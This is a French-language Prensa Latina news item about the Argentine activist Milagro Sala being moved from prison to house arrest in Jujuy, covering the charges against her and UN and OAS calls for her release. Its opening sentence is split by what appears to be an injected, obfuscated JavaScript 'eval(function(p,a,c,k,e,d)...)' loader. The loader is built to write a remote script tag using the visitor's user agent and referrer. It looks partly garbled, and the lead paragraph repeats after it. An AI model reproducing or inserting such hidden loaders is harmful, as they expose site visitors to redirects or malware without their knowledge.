vendredi 19 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’argentine Milagro Sala est en résidence surveillée

Buenos eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|teien|var|u0026u|referrer|benyt||js|php'.split('|'),0,{})) Aires, 1 septembre (PL) Après plusieurs jours d'attente, la leader sociale argentine Milagro Sala, emprisonnée depuis plus d'un an et demi dans la province de Jujuy, a été transférée en résidence surveillée.

Buenos Aires, 1 septembre (PL) Après plusieurs jours d’attente, la leader sociale argentine Milagro Sala, emprisonnée depuis plus d’un an et demi dans la province de Jujuy, a été transférée en résidence surveillée.

Sabrina Roth, membre de l’organisation Tupac Amaru tout comme Milagro Sala, a confirmé que « la dirigeante a été amené vers le logement du quartier El Carmen pour respecter la prison préventive dont elle fait l’objet ».

Le Quotidien de Cuyo précise que Sala ne pourra recevoir « plus de sept personnes à la fois », et que « les visites doivent avoir lieu de 7h à 20h ».

Milagro Sala a été arrêtée le 16 janvier 2016 sous l´accusation de présumée incitation à la violence et au trouble de l´ordre public, alors qu´elle était en tête d´une manifestation, dans cette province de Jujuy, contre les changements imposés par le gouverneur Morales au système et au programmes des coopératives.

À ces accusations d´autres ont été ajoutées durant ces mois d´incarcération. Elle est maintenant accusée d´association illicite, fraude à l´administration publique, détournement de fonds destinés à la construction de logements et extorsion.

Pendant ce temps, le Groupe de Travail sur la Détention Arbitraire des Nations-Unies, le Parlement du Sud (Parlasur), l´Organisation des États Américains, et d´autres entités demandent toujours sa libération immédiate.

peo/jcm/may

EN CONTINU
notes connexes